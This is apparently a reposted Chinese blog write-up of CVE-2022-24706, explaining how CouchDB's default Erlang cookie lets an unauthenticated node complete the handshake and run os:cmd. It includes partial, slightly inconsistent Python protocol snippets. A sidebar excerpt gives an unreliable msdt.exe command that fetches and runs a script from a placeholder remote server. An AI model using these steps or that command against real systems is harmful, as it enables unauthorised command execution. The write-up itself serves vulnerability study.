CVE-2022-24706 Apache CouchDB 远程命令执行漏洞

最新推荐文章于 2024-05-18 08:00:00 发布
最新推荐文章于 2024-05-18 08:00:00 发布
阅读量2.5k 收藏 2
点赞数 1
分类专栏: 漏洞分析及复现 文章标签: apache
原文链接:https://mp.weixin.qq.com/s/iITmyrDg7wUU6eZPQ3_a5w
版权

前言

出品|且听安全(ID:QCyber)
以下内容,来自且听安全公众号的作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

漏洞简介

在`v3.2.2`版本之前的`Apache CouchDB`中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限,进而实现RCE ,漏洞编号CVE-2022-24706。除了需要满足版本需求外,漏洞触发还需有以下条件:

  • `4369` `epmd` 端口暴露至公网;

  • `Erlang`使用默认`Cookie` 值( `monster` );

  • 目标主机防火墙未设置拦截访问任意端口。

该漏洞看似是`Apache CouchDB`的漏洞,实际上是`Erlang`分布式系统的正常功能,只不过`Apache CouchDB`的`erl`节点使用了默认的`monster` `Cookie` ,其他`erl`节点使用相同的`Cookie`可以与`CouchDB`中的分布式节点建立连接并进行通信,在通信的过程中就可以使用`os:cmd`执行底层系统命令。具体交互过程如下:

图片

利用者只需要完成以下操作:

  • 使用`epmd`协议,与`epmd`程序进行交互查询其中的`erl`节点;

  • 直接与`CouchDB`中的`erl`节点进行通信,接收节点发送来的`Challenge`;

  • 向`CouchDB` `erl`节点发送根据`Challenge`计算的`hash`值;

  • `CouchDB` `erl`节点比对`hash`值相同后回复`Challenge ACK` 。

之后利用者可执行任意指令。

漏洞分析

可以通过`Docker`搭建`Apache Couch-DB`,手动编译生成`Erlang`分布式应用:

图片

在漏洞简介部分已经说明该漏洞是`erl`分布式的正常功能,因此在漏洞分析的时候主要分析`erlang`节点通信相关流程及协议交互过程。

`erlang`分布式协议主要在源代码的`/erts/doc/src/erl_dist_protocol.xml`文件中,也可以在`erlang`官网

`https://www.erlang.org/doc/apps/erts/erl_dist_protocol.html`查看协议格式。

0x01 启动 erl 节点

在两个不同的虚拟机上启动 `erl` 节点:

  • `192.168.147.129`
cd /usr/local/erlang/otp_src_19.3/bin
./erl -setcookie monsters -name test@192.168.147.129
  • `192.168.147.22`
./erl -setcookie monsters -name test2

0x02 查询EPMD节点请求

在`192.168.147.22`机器上执行如下指令:

图片

通过`wireshark`获取流量,协议内容如下:

图片

`epmd`回应包如下,在数据包中可看到在`epmd`注册的所有`erl`节点名称:

图片

根据`erlang`分布式协议`epmd`节点查询请求格式,构造查询数据包,协议格式如下:

图片

EPM_NAME_CMD = b"\x00\x01\x6e" #1 110
s.send(EPM_NAME_REQ)
data=s.recv(4)
erl_node = s.recv(1024)
print erl_node

代码运行结果如下,将会获取所有注册在`epmd`上的`erl`节点:

图片

0x03 erlang 分布式节点挑战相应机制

在`192.168.147.22`上执行如下指令:

./erl -setcookie monsters -name test2 -remsh test@192.168.147.129

该指令属于两个节点的通信交互指令,在`erlang`分布式协议中,`A`节点向`B`节点建立连接需要发起连接请求,`A`节点发送当前主机名等信息,并接受来自`B`节点的`status`响应,协议数据如下所示:

图片

`send_name`协议格式如下:

图片

`Version0`和`Version1`是`A`基于`EPMD`选择的分布式协议版本

`capability flags`为`A`设置的能力标志,`Name`为`A`节点的全名:

NAME_MSG = "test@DESKTOP-M4IDODK.localdomain"
s.send(NAME_MSG)
s.recv(5)                    # Receive "ok" message

之后便开始执行挑战响应。挑战响应机制总共分为三个步骤,如下图所示

`SEND_CHALLENGE`、

`SEND_CHANLLENGE_REPLY` 、

`SEND_CHALLENGE_ACK` :

图片

(1)发送`Challenge`数据

服务端发送带有随机数的 `Challenge` 数据包,如下图所示:

图片

获取固定偏移的`Challenge`字符串。

(2)发送带有`Cookie` + `Challenge`哈希值连接端将`Cookie` 和`Challenge`拼接在一起计算`MD5`值,如下图`Digest`

所示:

图片

使用`MD5`算法计算`Cookie`和`Chall-enge`的哈希值。

(3)`Challenge` 响应包

如果含有的`Cookie`相同则发送带有内容的响应数据包:

图片

0x04 erlang 节点命令执行

`erlang`分布式节点的命令执行语句如下:

os:cmd("id").

通过该语句可以在远程分布式节点执行系统命令,协议中的主要内容如下:

图片

`erlang`分布式节点在执行命令时需要发送对应的控制指令:

图片

执行的命令需要进行一层封装。

漏洞复现

编写EXP,验证命令执行:

图片

小结

此次`Apache CouchDB`漏洞实际的利用使用的是在2017年曝光的`erlang`分布式RCE漏洞,`CouchDB`使用了`erlang`的分布式架构进行处理,在正常的配置使用过程中`erlang`分布式节点开放的端口是可以外部访问,并且在 `CouchDB`部署启动时内置了默认`Cookie` ,这就可以使用合法`Cookie`操作`erlang`内部分布式节点执行系统命令。

长白山攻防实验室
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Couchdb 垂直权限绕过漏洞CVE-2017-12635)
一枚不知名的Java程序猿
10-02 959
vulhub漏洞复现学习过程
Apache CouchDB 代码执行漏洞CVE-2022-24706
murphysec的博客
04-27 1447
CVE-2022-24706漏洞是由于3.2.2 版本之前的 CouchDB 的默认配置存在缺陷点, 攻击者可以在未进行身份验证的情况下访问不正确的默认安装进而获得管理员权限。该漏洞影响范围小,建议用户在所有 CouchDB 安装之前安装防火墙。完整的CouchDB api 在注册端口“5984”上可用,这是唯一的需要为单节点安装公开的端口。 编号      CVE-2022-24706 标题 Apache CouchDB 代码执行漏洞 描述 Apache CouchDB是一个开源数据库
每日一漏洞cve-2022-24706
jjjj1029056414的博客
07-14 279
复现cve-2022-24706CouchDB Erlang代码执行
未授权访问:CouchDB 未授权访问漏洞
最新发布
qq_68163788的博客
05-18 446
Apache CouchDB是一个开源数据库,应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序),默认会在5984端口开放Restful的API接口,如果使用SSL的话就会监听在6984端口,用于数据库的管理功能。 其HTTP Server默认开启时没有进行验证,而且绑定在0.0.0.0,所有用户均可通过API访问导致未授权访问。
CouchDB Erlang 分布式协议代码执行 (CVE-2022-24706) vulhub漏洞复现
qq_53003652的博客
07-19 405
由于Erlang的特性,其支持分布式计算,分布式节点之间通过Erlang/OTP Distribution协议进行通信。攻击者如果知道通信时使用的Cookie,即可在握手包通过认证并执行任意命令。使用如下poc,该poc可以通过目标的4369端口epmd服务获取集群通信的端口,就是9100,再使用默认Cookie来控制节点执行任意命令。在CouchDB 3.2.1及以前版本中,使用了默认Cookie,值为“monster”。不过不用管,此漏洞只经过4369和9100。执行该poc可进行任意命令执行
漏洞复现】CVE-2022-24706 CouchDB Erlang 分布式协议代码执行
m0_53121608的博客
07-13 613
漏洞复现】CVE-2022-24706 CouchDB Erlang 分布式协议代码执行
Apache CouchDB 远程代码执行漏洞风险通告(CVE-2022-24706
云加速
05-01 762
Apachecouchdb官方发布安全通告,公告中修复了一个远程代码执行漏洞漏洞编号CVE-2022-24706。可导致远程攻击者获得管理员权限等危害。 为避免您的业务受影响,腾讯云安全建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。漏洞详情Apache CouchDB数据库,它类似于Redis,Cassandra和MongoDB,也是一个NoSQL数据库。 CouchDB将数据存储为非关系性的JSON文档。 这使得CouchDB的用户可以以与现实世界相似的方式来存..
Apache CouchDB 代码执行漏洞(CVE-2022-24706 )批量POC
苏落is菜鸡的博客
06-11 1920
CVE-2022-24706漏洞是由于3.2.2 版本之前的 CouchDB 的默认配置存在缺陷点, 攻击者可以在未进行身份验证的情况下访问不正确的默认安装进而获得管理员权限。该漏洞影响范围小,建议用户在所有 CouchDB 安装之前安装防火墙。完整的CouchDB api 在注册端口“5984”上可用,这是唯一的需要为单节点安装公开的端口。...
Goby漏洞更新|Apache CouchDB 未认证远程代码执行漏洞 (CVE-2022-24706)
m0_46699477的博客
04-17 256
CVE-2023-24706 Apache CouchDB是美国阿帕奇(Apache)基金会的使用Erlang开发的一套面向文档的数据库系统。Apache CouchDB 3.2.2 之前存在访问控制错误漏洞,该漏洞源于攻击者可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限。
Apache CouchDB 远程代码执行漏洞CVE-2022-24706
时光不老的博客
11-29 497
Apache CouchDB 数据库,它类似于 Redis,Cassandra 和 MongoDB,也是一个 NOSQL 数据库。CouchDB 将数据存储为非关系性的 JSON 文档。 Apache CouchDB 官方发布安全通告,公告中修复了一个远程代码执行漏洞漏洞编号 CVE-2022-24706,可导致远程攻击者获得管理员权限等危害。
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
spring Framework 远程命令执行漏洞CVE-2022-22965漏洞脚本自用
10-27
首先,我们需要理解什么是远程命令执行漏洞。RCE漏洞允许攻击者通过网络在目标系统上执行任意命令,通常是因为程序处理用户输入时存在不安全的代码实践。在Spring4Shell漏洞中,问题出在Spring MVC和Spring WebFlux...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
然而,它存在一个名为 CVE-2022-33891 的严重安全漏洞,这是一个命令注入问题,允许攻击者通过精心构造的请求在运行受影响版本的 Spark 实例上执行任意系统命令。 此漏洞源于 Spark Web UI 的一个缺陷,特别是与其 ...
13 - vulhub - Couchdb 任意命令执行漏洞CVE-2024-12636)
04-16 819
这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。基本上主流的和经典的都有,这里我就不放图了,版权问题,个人看看是没有问题的。
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 374
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
服务攻防-数据库安全-Influxdb&H2database&CouchDB&ElasticSearch数据库漏洞复现
ran的博客
05-07 2399
默认端口:InfluxDB 是一个开源的时间序列数据库,旨在处理大规模数据处理和分析的高写入和查询负载。它针对实时存储和查询大量时间戳数据进行了优化。InfluxDB 提供了一种类似 SQL 的查询语言称为 InfluxQL,允许用户从数据库中检索和操作数据。它还支持各种客户端库和插件,以与其他数据源和工具集成。InfluxDB 的一些主要特点包括:高写入和查询性能:InfluxDB 优化了高吞吐量数据摄取和检索,非常适合实时数据处理和分析。
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞的复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值